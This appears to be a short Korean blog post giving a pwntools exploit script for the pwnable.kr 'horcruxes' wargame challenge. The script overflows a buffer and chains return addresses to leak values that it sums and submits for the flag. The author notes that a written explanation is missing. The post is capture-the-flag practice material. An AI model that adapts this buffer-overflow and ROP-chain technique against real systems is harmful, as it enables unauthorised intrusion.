[pwnable.kr] horcruxes

 

 

 

 

 

 

 

 

from pwn import *
context.log_level = 'debug'

s = ssh(user='horcruxes', host='pwnable.kr', port=2222, password='guest')

conn = s.connect_remote('localhost',9032)

A_addr = 0x809fe4b
B_addr = 0x809fe6a
C_addr = 0x809fe89
D_addr = 0x809fea8
E_addr = 0x809fec7
F_addr = 0x809fee6
G_addr = 0x809ff05
call_ropme_addr = 0x0809fffc

payload = 'A'*120

payload += p32(A_addr)
payload += p32(B_addr)
payload += p32(C_addr)
payload += p32(D_addr)
payload += p32(E_addr)
payload += p32(F_addr)
payload += p32(G_addr)
payload += p32(call_ropme_addr)

conn.recvuntil("Select Menu:")
conn.sendline("1")
conn.recvuntil("How many EXP did you earned? : ")
conn.sendline(payload)

sum = 0

for i in range(0,7):
	conn.recvuntil("EXP +")
	sum += int(conn.recvuntil(')')[:-1])

conn.recvuntil("Select Menu:")
conn.sendline("1")
conn.recvuntil("How many EXP did you earned? : ")

conn.sendline(str(sum))
conn.recv(2048)

conn.interactive()

 

풀고나서 캡쳐만 해두고 블로그에 바로 업로드를 안하니까 해설을 어디에 썼는지를 까먹었다..

시간을 내서 다시 해설을 써야겠다..